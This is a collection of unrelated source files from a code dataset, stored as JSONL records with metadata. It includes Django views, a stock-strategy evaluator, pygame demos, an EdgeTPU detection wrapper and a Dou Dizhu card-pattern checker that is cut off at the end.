fo=open('finallink.txt','a')\n fo.write(url + \"\\n\")\n fo.close()\n yield Request(url, callback=self.parse)\n\n","sub_path":"crawler iitg intranet/craigslist_sample/spiders/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"53626420","text":"\nfrom ast import *\n\n\nclass PreprocCmdInfo(NodeTransformer):\n \n def __init__(self, aa):\n super(PreprocCmdInfo, self).__init__()\n self.p = aa.p\n self.topic = aa.topic\n\n def visit_Name(self, node):\n if node.id == 'TARGET_DIRECTORY':\n\n self.p.lineno = node.lineno\n self.p.col_offset = node.col_offset\n return self.p\n\n if node.id == 'TOPIC':\n\n self.topic.lineno = node.lineno\n self.topic.col_offset = node.col_offset\n return self.topic\n\n else:\n return node","sub_path":"src/astop/preproc_cmd_info.py","file_name":"preproc_cmd_info.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"358875219","text":"# -*- coding: utf-8 -*-\n\nimport math\nimport traceback\nimport datetime\nfrom django.db.models import Q\nfrom polls.util import commonUtil\nfrom polls.models import StockStrategy, Strategy, Data1, Data2, Data3, Data4\nfrom polls.module import analysis, data, test\n\nprev = 45\t#特征值前数据个数\nlast = 15\t#特征值后数据个数\n\ncheckDateList = [1, 3, 5, 10, 30]\n\ndef _delStrategyRate(strategy):\n\tcount, ret = StockStrategy.objects.filter(strategy=strategy).delete()\n\tcommonUtil.debug('[StockStrategy]: ' + strategy + ' delete ' + str(count) + ' item(s)')\n\tcount, ret = Strategy.objects.filter(strategy=strategy).delete()\n\tcommonUtil.debug('[Strategy]: ' + strategy + ' delete ' + str(count) + ' item(s)')\n\ndef _saveRate(code, stType, matchcount, date, curDateRate, item, countList, sucList, suc1List, voidList, failList):\n\tdata = StockStrategy(code=code, strategy=stType, matchcount=matchcount, date=date, \n\t\tcurDateRate=curDateRate, supershort=item[0], short=item[1], middle=item[2], Long=item[3], superlong=item[4],\n\t\tsupershortcount=countList[0],shortcount=countList[1],middlecount=countList[2],Longcount=countList[3],superlongcount=countList[4],\n\t\tsupershortrate=sucList[0], shortrate=sucList[1], middlerate=sucList[2], Longrate=sucList[3], superlongrate=sucList[4],\n\t\tsupershortsuc=suc1List[0], shortsuc=suc1List[1], middlesuc=suc1List[2], Longsuc=suc1List[3], superlongsuc=suc1List[4],\n\t\tsupershortvoid=voidList[0], shortvoid=voidList[1], middlevoid=voidList[2], Longvoid=voidList[3], superlongvoid=voidList[4],\n\t\tsupershortfail=failList[0], shortfail=failList[1], middlefail=failList[2], Longfail=failList[3], superlongfail=failList[4])\n\tret = data.save()\n\ndef _saveStrategyRate(stType, matchcount, codematchcount, item, countList, sucList, suc1List, voidList, failList):\n\tdata = Strategy(strategy=stType, matchcount=matchcount, codematchcount=codematchcount,\n\t\tsupershort=item[0], short=item[1], middle=item[2], Long=item[3], superlong=item[4],\n\t\tsupershortcount=countList[0],shortcount=countList[1],middlecount=countList[2],Longcount=countList[3],superlongcount=countList[4],\n\t\tsupershortrate=sucList[0], shortrate=sucList[1], middlerate=sucList[2], Longrate=sucList[3], superlongrate=sucList[4],\n\t\tsupershortsuc=suc1List[0], shortsuc=suc1List[1], middlesuc=suc1List[2], Longsuc=suc1List[3], superlongsuc=suc1List[4],\n\t\tsupershortvoid=voidList[0], shortvoid=voidList[1], middlevoid=voidList[2], Longvoid=voidList[3], 
superlongvoid=voidList[4],\n\t\tsupershortfail=failList[0], shortfail=failList[1], middlefail=failList[2], Longfail=failList[3], superlongfail=failList[4])\n\tret = data.save()\t\n\ndef _calRate(dataList, count): #计算幅度\n\trate = 100\n\tif len(dataList) < count:\n\t\treturn '-'\n\tfor i in range(count):\n\t\trate *= (100 + float(dataList[i][4])) / 100\n\treturn round(rate, 2)\n\ndef _classifyFilter(ft, code, stType, matchcount):\n\tnull = ['-'] * 5\n\trateList = []\n\tdate = ft[0][0].split(' ')[0] #\"2000-04-06 (Tag)\"日期格式去掉Tag\n\tfor count in checkDateList: #分类计算\n\t\trateList.append(_calRate(ft[1:count+1], count))\n\t_saveRate(code, stType, matchcount, date, ft[0][4], rateList, null, null, null, null, null)\t#保存幅度结果\n\treturn [100 if x == '-' else x for x in rateList] #如果是‘-’替换成标准值100\n\t\n\ndef _addList(comList, rateList):\n\treturn list(map(lambda a,b:a+b, comList, rateList))\n\ndef _forFilter(filterList, code, stType):\n\tmatchcount = 0\n\tcomSucList = [0] * 5 #初始化每个code sucList值(3%)\n\tcomSuc1List = [0] * 5 #初始化每个code suc1List值(1%)\n\tcomVoidList = [0] * 5 #初始化每个code voidList值\n\tcomFailList = [0] * 5 #初始化每个code failList值\n\tcomRateList = [0] * 5 #初始化每个code rateList值\n\tfor item in filterList: #循环筛选列表\n\t\tmatchcount += 1\n\t\trateList = _classifyFilter(item['selectedData'][prev :], code, stType, matchcount)\n\t\tcomSucList = _addList(comSucList, [1 if x >= 103 else 0 for x in rateList]) #每项大于103数目相加\n\t\tcomSuc1List = _addList(comSuc1List, [1 if x >= 101 else 0 for x in rateList]) #每项大于101数目相加\n\t\tcomVoidList = _addList(comVoidList, [1 if 101 > x > 99 else 0 for x in rateList]) #每项99-101数目相加\n\t\tcomFailList = _addList(comFailList, [1 if x <= 99 else 0 for x in rateList]) #每项小于99数目相加\n\t\tcomRateList = _addList(comRateList, rateList) #每项rate值相加\n\n\tif matchcount:\t#必须有筛选��,否则不用计算综合值\n\t\tcomRateList = [round(x/matchcount, 2) for x in comRateList] #计算每个code综合rate值\n\t\tcomSucRatioList = [round(x/matchcount*100, 2) for x in comSucList] #计算每个code综合suc占比值\n\t\tcomSuc1RatioList = [round(x/matchcount*100, 2) for x in comSuc1List] #计算每个code综合suc1占比值\n\t\tcomVoidRatioList = [round(x/matchcount*100, 2) for x in comVoidList] #计算每个code综合void占比值\n\t\tcomFailRatioList = [round(x/matchcount*100, 2) for x in comFailList] #计算每个code综合fail占比值\n\t\t_saveRate(code, stType, matchcount, '-', '-', comRateList, comSucList, comSucRatioList, comSuc1List, comVoidList, comFailList) #保存每个code综合rate值\n\t\treturn commonUtil.debug(code + ' train [' + stType + '] save success')\n\n\treturn commonUtil.debug(code + ' train [' + stType + '] no result!')\n\n#策略列表\nstNameList = {\n\t#\"2\": \"strategy1\",\n\t\"3\": \"strategy2\",\n\t#\"4\": \"strategy3\",\n\t#\"5\": \"strategy4\",\n\t#\"6\": \"strategy5\",\n\t#\"7\": \"strategy6\",\n\t#\"8\": \"strategy7\",\n\t#\"9\": \"strategy8\",\n\t#\"10\": \"strategy9\",\n} \n\ndataItemList = ['supershort','short', 'middle', 'Long', 'superlong', \n\t'supershortcount', 'shortcount', 'middlecount', 'Longcount', 'superlongcount', \n\t'supershortsuc', 'shortsuc', 'middlesuc', 'Longsuc', 'superlongsuc',\n\t'supershortvoid', 'shortvoid', 'middlevoid', 'Longvoid', 'superlongvoid',\n\t'supershortfail', 'shortfail', 'middlefail', 'Longfail', 'superlongfail']\n\ndef _addComRate(rateList):\n\ttotalRateList = [0] * 25 #初始化每个stratery rateList值\n\tfor item in rateList:\n\t\trate = [float(item[index]) for index in dataItemList]\n\t\ttotalRateList = _addList(totalRateList, rate)\n\treturn totalRateList\n\ndef _getCodeCom(stName):\t#根据-获得各code综合值\n\tdata = StockStrategy.objects.filter(strategy = 
stName, curDateRate = '-').values('supershort','short', \n\t\t'middle', 'Long', 'superlong', 'supershortcount', 'shortcount', 'middlecount', 'Longcount', 'superlongcount', \n\t\t'supershortsuc', 'shortsuc', 'middlesuc', 'Longsuc', 'superlongsuc',\n\t\t'supershortvoid', 'shortvoid', 'middlevoid', 'Longvoid', 'superlongvoid',\n\t\t'supershortfail', 'shortfail', 'middlefail', 'Longfail', 'superlongfail')\n\trateList = commonUtil.queryset_to_dict(data, ['supershort','short', \n\t\t'middle', 'Long', 'superlong', 'supershortcount', 'shortcount', 'middlecount', 'Longcount', 'superlongcount', \n\t\t'supershortsuc', 'shortsuc', 'middlesuc', 'Longsuc', 'superlongsuc',\n\t\t'supershortvoid', 'shortvoid', 'middlevoid', 'Longvoid', 'superlongvoid',\n\t\t'supershortfail', 'shortfail', 'middlefail', 'Longfail', 'superlongfail'])\n\tcount = StockStrategy.objects.filter(strategy = stName).exclude(curDateRate = '-').count()\n\treturn count, rateList\n\ndef _strategyRate(stName):\n\tcount, rateList = _getCodeCom(stName)\t#根据-获得各code综合值\n\tn = len(rateList)\n\tret = _addComRate(rateList)\t#综合值相加\n\n\ttotalSucList = ret[5:10]\n\ttotalSuc1List = ret[10:15]\n\ttotalVoidList = ret[15:20]\n\ttotalFailList = ret[20:]\n\tif n:\n\t\ttotalRateList = [round(x / n, 2) for x in ret[:5]] #前边5个为幅度\n\t\ttotalSucRatioList = [round(x / count, 2) for x in totalSucList]\t#后边5个为数目\n\t\ttotalSuc1RatioList = [round(x / count, 2) for x in totalSuc1List]\t#\n\t\ttotalVoidRatioList = [round(x / count, 2) for x in totalVoidList]\t#\n\t\ttotalFailRatioList = [round(x / count, 2) for x in totalFailList]\t#\n\n\t\t_saveStrategyRate(stName, count, n, totalRateList, totalSucList, totalSucRatioList, totalSuc1RatioList, totalVoidRatioList, totalFailRatioList) #保存每个strategy综合rate值\n\ndef _codeDataMatch(code, stIndex, stName):\n\tstockList = []\n\tflag, stockData = commonUtil.queryUnfoldDataT(code) #获取code对应data\n\tfor item in stockData['data']:\n\t\tstockList.append(commonUtil.dictToList(item, ['date','start', 'end', 'change', 'changeRate', 'top', 'bottom', 'volume', 'trade', 'tradeRate']))\n\t#stockList = commonUtil.getPreData(code)\n\tfilterList, stType = analysis._packageData(stockList, prev, last, stIndex)\t#将data用strategy匹配\n\t_forFilter(filterList, code, stName)\n\ndef _getStockCode(stIndex, stName):\n\tcodeList = data._queryAllStockCode()\t#获取所有code\n\t_delStrategyRate(stName)\t#存入之前,删除对应strategy数据,防止数据重复\n\tfor item in codeList:\n\t\t_codeDataMatch(item['code'], stIndex, stName)\n\t_strategyRate(stName)\t#存入StrategyRate\n\ndef evaluateSt(request):\n\tfor stIndex in stNameList:\t#轮训策略\n\t\t_getStockCode(stIndex, stNameList[stIndex])\n\t#test.testSt('test')\n","sub_path":"polls/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":8834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"290820648","text":"import requests\nimport json\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\nwinners_wiki_url = 'https://en.wikipedia.org/w/api.php?action=parse&format=json&prop=text&page=List_of_2016_Summer_Olympics_medal_winners§ion='\n# response = requests.get(wiki_url)\n# data = json.loads(response.text)\n# print(data)\n\n\nhtml_index_list = list(range(1, 78))\nremoveable_indicies = [2, 7, 12, 17, 22, 26, 33, 39, 43, 47, 51, 54, 59, 68, 71, 75, 76, 77, 78]\nfor index in removeable_indicies:\n if index in (html_index_list):\n html_index_list.remove(index)\n\nfor index in html_index_list:\n url = winners_wiki_url + str(index)\n response = requests.get(url)\n HTML = 
json.loads(response.text)['parse']['text']['*']\n\n\n\n\n\n","sub_path":"Citadel Data Open/Code/webscrape.py","file_name":"webscrape.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"625522327","text":"from django.shortcuts import render_to_response\nfrom django.db.models import Q\nfrom django.core.context_processors import csrf\nfrom django.http import HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\nfrom usuarios.models import *\nfrom gestion_cuestionarios.forms import *\nfrom django.template import RequestContext\n\n\nfrom cuestionarios.models import Cuestionario\n\n\n\ndef view_lista_cuestionarios(request):\n permisos={}\n if \"user\" in request.COOKIES:\n id=int(request.COOKIES.get(\"user\", ''))\n usuario=User.objects.get(id=id)\n userpermisos=UserPermisos.objects.get(user=usuario.id)\n permisos['issueper']=usuario.is_superuser\n permisos['isadmin']=userpermisos.admin\n permisos['issup']=userpermisos.supervisor\n permisos['isexp']=userpermisos.experto\n if userpermisos.experto: \n cuestionarios=Cuestionario.objects.filter(user=id)\n cuestionariosactivos=Cuestionario.objects.filter(~Q(pk__in=cuestionarios)& Q(activo=True))\n contexto = {'cuestionarios': cuestionarios, 'permisos':permisos, 'cuestionarios_activos':cuestionariosactivos, 'user':usuario, 'userid':id}\n elif userpermisos.supervisor:\n cuestionarios=Cuestionario.objects.all()\n contexto = {'cuestionarios': cuestionarios, 'permisos':permisos, 'user':usuario, 'userid':id}\n else:\n cuestionarios=Cuestionario.objects.filter(activo=True)\n contexto = {'cuestionarios_activos': cuestionarios, 'permisos':permisos, 'user':usuario, 'userid':id}\n mensaje=''\n \n if \"mensaje\" in request.COOKIES:\n mensaje=request.COOKIES.get(\"mensaje\", '')\n contexto['mensaje']=mensaje\n response=render_to_response(r'gestion_cuestionarios/lista_cuestionarios.html',RequestContext(request, contexto))\n response.delete_cookie(\"mensaje\")\n return response\n else:\n return HttpResponseRedirect('/')\n\ndef view_nuevo_cuestionario(request):\n if \"user\" in request.COOKIES:\n userid=int(request.COOKIES.get(\"user\", ''))\n if request.method==\"POST\":\n form = CuestionarioForm(request.POST)\n if form.is_valid():\n cuestionario=Cuestionario()\n cuestionario.nombre=form.cleaned_data['nombre']\n cuestionario.descripcion=form.cleaned_data['descripcion']\n cuestionario.user_id=userid\n cuestionario.active=False\n cuestionario.save()\n return HttpResponseRedirect(reverse(view_lista_cuestionarios))\n else:\n form = CuestionarioForm()\n contexto={'form':form}\n contexto.update(csrf(request))\n return render_to_response(r'gestion_cuestionarios/nuevo_cuestionario.html',contexto)\n return HttpResponseRedirect('/')\n \ndef view_eliminar_cuestionario(request):\n if 'idcuestionario' in request.GET: \n cuest_id = request.GET['idcuestionario']\n cuestionario = Cuestionario.objects.get(pk=cuest_id)\n cuestionario.delete()\n return HttpResponseRedirect(reverse(view_lista_cuestionarios))\n\ndef view_activar_desc_cuestionarios(request, id):\n cuestionario=Cuestionario.objects.get(pk=id)\n cuestionario.activo=not cuestionario.activo\n cuestionario.save()\n return HttpResponseRedirect(reverse(view_lista_cuestionarios))\n \n","sub_path":"gestion_cuestionarios/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} 
+{"seq_id":"154532039","text":"import pygame\r\npygame.init()\r\n\r\nFULL_SCREEN_SIZE = pygame.display.list_modes()[0]\r\nWIN_SIZE = [i // 4 for i in FULL_SCREEN_SIZE]\r\n\r\nscreen = pygame.display.set_mode(WIN_SIZE)\r\n\r\nrun = True\r\nwhile run:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n run = False\r\n \r\n pygame.display.flip()\r\n\r\npygame.quit()\r\n","sub_path":"demo/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"267671113","text":"import pygame\nfrom pygame import font \nimport os\nbundle_dir = sys._MEIPASS\nimport sys\n#from images import *\n\n\npygame.init()\nx = pygame.font.get_fonts()\nfor fnts in x:\n\tif fnts == 'freesandsbold':\n\t\tprint (\"found it\")\n\nblack = (0,0,0)\n\ntextBoxImage = pygame.image.load(bundle_dir + '/images/sideMenuBox.png')\t\nlargeText = pygame.font.Font(bundle_dir + '/fonts/FreeSansBold.ttf',25)\nhldtext = \"Press Z to quit\"\n\nclock = pygame.time.Clock()\ngameDisplay = pygame.display.set_mode((800,600)) \n\ndisplaying = True\n\ndef text_objects(text, font):\n\ttextSurface = font.render(text, True, black)\n\treturn textSurface, textSurface.get_rect()\n\n#largeText = pygame.font.Font('freesansbold.ttf',25)\n\n\nwhile displaying:\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.KEYUP and event.key == pygame.K_z:\n\t\t\tdiplaying = False\n\t\t\tsys.exit()\n\t\t\tpygame.quit()\n\t\t\t#quit()\n\t\t\n\n\n\tgameDisplay.fill((255, 255, 255))\n\n\tgameDisplay.blit(textBoxImage, (550,1))\t\n\tBottomSurf, BottomRect = text_objects(hldtext, largeText)\n\tBottomRect.center = ((200),(370))\n\tgameDisplay.blit(BottomSurf, BottomRect)\n\tpygame.display.flip()\n\tclock.tick(15)\n\n\t\n","sub_path":"pyIn/pygametest1/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"525158332","text":"import models\n\npulp_fiction = models.Video(\"Pulp Fiction\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t8.9,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\"https://upload.wikimedia.org/wikipedia/en/8/82/Pulp_Fiction_cover.jpg\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\"https://www.youtube.com/watch?v=ewlwcEBTvcg\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\"1994\"\n\t\t\t\t\t\t\t\t\t\t\t)\n\nfight_club = models.Video(\"Fight Club\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t8.9,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\"http://upload.wikimedia.org/wikipedia/en/f/fc/Fight_Club_poster.jpg\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\"https://www.youtube.com/watch?v=SUXWAEX2jlg\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\"1999\"\n\t\t\t\t\t\t\t\t\t\t\t)\n\ninception = models.Video(\"Inception\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t8.8,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\"https://upload.wikimedia.org/wikipedia/en/7/7f/Inception_ver3.jpg\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\"https://www.youtube.com/watch?v=8hP9D6kZseM\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\"2010\"\n\t\t\t\t\t\t\t\t\t\t\t)\n\ncity_of_god = models.Video(\"City of God\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t8.7,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\"https://upload.wikimedia.org/wikipedia/en/1/10/CidadedeDeus.jpg\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\"https://www.youtube.com/watch?v=_mDvXaRJcTM\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\"2002\"\n\t\t\t\t\t\t\t\t\t\t\t)\n\ntrue_detective = models.Video(\"True 
Detective\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t9.3,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"http://ecx.images-amazon.com/images/I/A1E8BYXdWML._SL1500_.jpg\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"https://www.youtube.com/watch?v=TXwCoNwBSkQ\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"2014 - \"\n\t\t\t\t\t\t\t\t\t\t\t)\n\nhouse_of_cards = models.Video(\"House of Cards\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t9.1,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"http://img4.wikia.nocookie.net/__cb20140217231358/house-of-cards/images/a/a8/House_of_Cards_Season_1_Poster.jpg\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"https://www.youtube.com/watch?v=ULwUzF1q5w4\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"2013 - \"\n\t\t\t\t\t\t\t\t\t\t\t)\n\ncowboy_bebop = models.Video(\"Cowboy Bebop\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t9.0,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"http://upload.wikimedia.org/wikipedia/en/3/37/CowboyBebopDVDBoxSet.jpg\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"https://www.youtube.com/watch?v=LnbKF_uosrA\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"1997 - 1998\"\n\t\t\t\t\t\t\t\t\t\t\t)\n\nbetter_call_saul = models.Video(\"Better Call Saul\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t9.4,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"http://proto.mtv.ca/wp-content/uploads/2015/02/tumblr_n1xyxwgXYE1qzpxx1o1_r1_1280.jpg\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"https://www.youtube.com/watch?v=9q4qzYrHVmI\",\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\"2015 - \"\n\t\t\t\t\t\t\t\t\t\t\t)\n\n# Sorry, please repeat yourself. List of movies goes here.\nmovies = [pulp_fiction, fight_club, inception, city_of_god, true_detective, house_of_cards, cowboy_bebop, better_call_saul]\n","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"40481667","text":"\"\"\"Modified EdgeTPU classes for ease of use.\"\"\"\nimport logging\nfrom edgetpu.detection.engine import DetectionEngine # pylint: disable=import-error\n\nfrom edgetpu_server.models.candidate import LabeledDetectionCandidate\n\n_LOGGER = logging.getLogger(__name__)\n\n\n# pylint: disable=too-few-public-methods\nclass DetectionFilter:\n \"\"\"Detection filter data.\"\"\"\n\n def __init__(self, threshold, labels, labels_to_report):\n _LOGGER.warn('Initializing detection engine')\n self.threshold = threshold\n self.labels = labels\n self.labels_to_report = labels_to_report\n\n def filter_candidates(self, candidates):\n \"\"\"Filter the detection engine results.\"\"\"\n filtered_candidates = []\n for result in candidates:\n label = self.labels.get(result.label_id, None)\n if not label or label not in self.labels_to_report:\n continue\n filtered_candidates.append(LabeledDetectionCandidate(label, result))\n\n return filtered_candidates\n\n\nclass FilteredDetectionEngine(DetectionEngine):\n \"\"\"Detection engine that filters detected objects.\"\"\"\n\n def __init__(\n self,\n detection_filter,\n model_path,\n detection_lock,\n device_path=None):\n \"\"\"\n Args:\n model_path (str): Path to a TensorFlow Lite (``.tflite``) file.\n This model must be `compiled for the Edge TPU\n `_; otherwise, it simply executes\n on the host CPU.\n device_path (str): The device path for the Edge TPU this engine should use. This argument\n is needed only when you have multiple Edge TPUs and more inference engines than\n available Edge TPUs. 
For details, read `how to use multiple Edge TPUs\n `_.\n\n Raises:\n ValueError: If the model's output tensor size is not 4.\n \"\"\"\n _LOGGER.warn('Initializing filtered detection engine')\n DetectionEngine.__init__(self, model_path, device_path)\n self._filter = detection_filter\n self._detection_lock = detection_lock\n\n def filtered_detect_with_image(self, image):\n \"\"\"Perform object detection on an image and passed through the filter criteria.\"\"\"\n self._detection_lock.acquire()\n try:\n return self._filter.filter_candidates(\n self.detect_with_image(\n image,\n threshold=self._filter.threshold / 100,\n keep_aspect_ratio=True,\n relative_coord=False\n )\n )\n finally:\n self._detection_lock.release()\n","sub_path":"edgetpu_server/detection_engine.py","file_name":"detection_engine.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"244986657","text":"#! /usr/bin/env python\n\ndef calc(cur, interest, mp): # current balance, interest, monthlypayments\n newbal=1\n remb=cur \n howmany=0\n while remb > 0:\n remb = remb - (mp - remb * interest / 12)\n howmany += 1\n # sss=raw_input(\"asdasd:\")\n\n newbal = howmany * mp + remb\n return (howmany, newbal)\n\n","sub_path":"Prelab09/Part1MOD.py","file_name":"Part1MOD.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"154096357","text":"import poker\n\n\nclass CardDescription:\n \"\"\"一手有效出牌的描述\"\"\"\n\n def __init__(self, pattern=0, weight=0):\n self.pattern = pattern\n self.weight = weight\n\n\n\"\"\"\n牌型 一个人最多54-3 = 51 51/3=17 最多20张\n这是斗地主的关键,即对牌型进行数字化分类,来判断是否可以出牌,和是否可以接牌\n炸弹统一为 4 2 8 这些小于100的\n101, 单排\n105 - 112 顺子最多为 3-A \n\n\"\"\"\npatterns_single = [101]\npatterns_single_straight = list(range(105, 113))\npatterns_pair = [202]\npatterns_pair_straight = list(range(206, 221, 2))\npatterns_triple = list(range(303, 321, 3))\npatterns_triple_single = list(range(404, 421, 4))\npatterns_triple_pair = list(range(505, 521, 5))\npatterns_four_two = list(range(606, 621, 6))\npatterns_four_pairs = list(range(708, 721, 8))\npatterns_grand_bomb = [2]\npatterns_bombs = list(range(4, 21, 4))\n\n_patterns_all = patterns_grand_bomb + patterns_bombs + \\\n patterns_single + patterns_single_straight + \\\n patterns_pair + patterns_pair_straight + \\\n patterns_triple + patterns_triple_single + patterns_triple_pair + \\\n patterns_four_two + patterns_four_pairs\n\n_patterns_text = [(patterns_grand_bomb, '王炸'),\n ([4], '炸弹'),\n (list(range(8, 21, 4)), '连炸'),\n (patterns_single, '*'),\n (patterns_single_straight, '顺子'),\n (patterns_pair, '对*'),\n (patterns_pair_straight, '连对'),\n ([303], \"三个*\"),\n ([404], '三带一'), ([505], '三带二'),\n ([606], '四带二'), ([708], '四带四'), ([612, 618, 716], '航天飞机!')]\n\n\ndef pattern_is_bomb(p):\n if p in patterns_grand_bomb or p in patterns_bombs:\n return True\n\n\ndef _switch_bomb_value(p):\n if p == 2:\n return 4\n elif p == 4:\n return 2\n else:\n return p\n\n\ndef _is_cd_bigger(cd: CardDescription, old_cd: CardDescription) -> bool:\n \"\"\"cd 是否大于old_cd, 大于就符合该cd\"\"\"\n if pattern_is_bomb(old_cd.pattern):\n old_bomb_p = _switch_bomb_value(old_cd.pattern)\n if pattern_is_bomb(cd.pattern):\n bomb_p = _switch_bomb_value(cd.pattern)\n if bomb_p > old_bomb_p:\n return True\n elif bomb_p == old_bomb_p:\n return cd.weight > old_cd.weight\n else:\n return False\n else:\n return False\n\n else:\n if pattern_is_bomb(cd.pattern):\n return True\n 
else:\n # 两个都不是bomb\n if cd.pattern == old_cd.pattern:\n return cd.weight > old_cd.weight\n else:\n return False\n\n\ndef is_cd_bigger(cd: CardDescription, old_cd: CardDescription) -> CardDescription:\n if _is_cd_bigger(cd, old_cd):\n return cd\n\n\ndef _single_or_straight_without_2(cards):\n pre = cards[0]\n for i in range(1, len(cards)):\n if pre + 1 == cards[i]:\n pre = cards[i]\n else:\n return False\n if pre <= poker.MIN3_2 or len(cards) == 1:\n return True\n\n# 下面是所有牌型检查\n\n\ndef _check_grand_bomb(cards):\n if cards[0] == poker.MIN3['V'] and cards[1] == poker.MIN3['W']:\n return CardDescription(2, cards[0])\n\n\ndef _check_bomb(cards):\n if cards[0] == cards[1] == cards[2] == cards[3]:\n pre = cards[0]\n for i in range(4, len(cards), 4):\n if cards[i] == cards[i + 1] == cards[i + 2] == cards[i + 3] and pre + 1 == cards[i]:\n pre = cards[i]\n else:\n return None\n if pre <= poker.MIN3['A']:\n return CardDescription(len(cards), cards[0])\n\n\ndef _check_single(cards):\n return CardDescription(101, cards[0])\n\n\ndef _check_single_straight_(cards):\n pre = cards[0]\n for i in range(1, len(cards)):\n if pre + 1 == cards[i]:\n pre = cards[i]\n else:\n return None\n if pre <= poker.MIN3['A']:\n return CardDescription(100 + len(cards), cards[0])\n\n\ndef _check_pair(cards):\n if cards[0] == cards[1]:\n return CardDescription(202, cards[0])\n\n\ndef _check_pair_straight(cards):\n if cards[0] == cards[1]:\n pre = cards[0]\n for i in range(2, len(cards), 2):\n if cards[i] == cards[i + 1] and pre + 1 == cards[i]:\n pre = cards[i]\n else:\n return None\n if pre < poker.MIN3_2:\n return CardDescription(200 + len(cards), cards[0])\n\n\ndef _check_triple(cards):\n if cards[0] == cards[1] == cards[2]:\n pre = cards[0]\n for i in range(3, len(cards), 3):\n if cards[i] == cards[i + 1] == cards[i + 2] and pre + 1 == cards[i]:\n pre = cards[i]\n else:\n return None\n if len(cards) > 3 and pre >= poker.MIN3_2:\n return\n return CardDescription(300 + len(cards), cards[0])\n\n\ndef _check_triple_single(cards):\n splits = poker.split_min3(cards)\n if 3 not in splits:\n return None\n is_straight = _single_or_straight_without_2(splits[3])\n if is_straight:\n if len(cards) == len(splits[3]) * 4:\n return CardDescription(400 + len(cards), splits[3][0])\n\n\ndef _check_triple_pair(cards):\n splits = poker.split_min3(cards)\n if 3 not in splits or 1 in splits or 4 in splits:\n return None\n is_straight = _single_or_straight_without_2(splits[3])\n if is_straight:\n if len(cards) == len(splits[3]) * 5:\n return CardDescription(500 + len(cards), splits[3][0])\n\n\ndef _check_four_two(cards):\n splits = poker.split_min3(cards)\n if 4 not in splits:\n return None\n is_straight = _single_or_straight_without_2(splits[4])\n if is_straight:\n if len(cards) == len(splits[4]) * 6:\n return CardDescription(600 + len(cards), splits[4][0])\n\n\ndef _check_four_pairs(cards):\n \"\"\"\n 四个一样的牌不允许拆分,防止歧义\n \"\"\"\n for i in range(0, len(cards), 2):\n if cards[i] != cards[i + 1]:\n return None\n # 寻找4个一样的牌的list\n fours = []\n for i in range(0, len(cards), 4):\n if cards[i] == cards[i + 2]:\n fours.append(cards[i])\n\n if len(fours) == len(cards) / 8:\n pre = fours[0]\n if i in range(1, len(fours)):\n if fours[i] == pre:\n pre = fours[i]\n else:\n return None\n return CardDescription(700 + len(cards), fours[0])\n\n\n_pattern_map_check = [(patterns_grand_bomb, _check_grand_bomb),\n (patterns_bombs, _check_bomb),\n (patterns_single, _check_single),\n (patterns_single_straight, _check_single_straight_),\n (patterns_pair, 
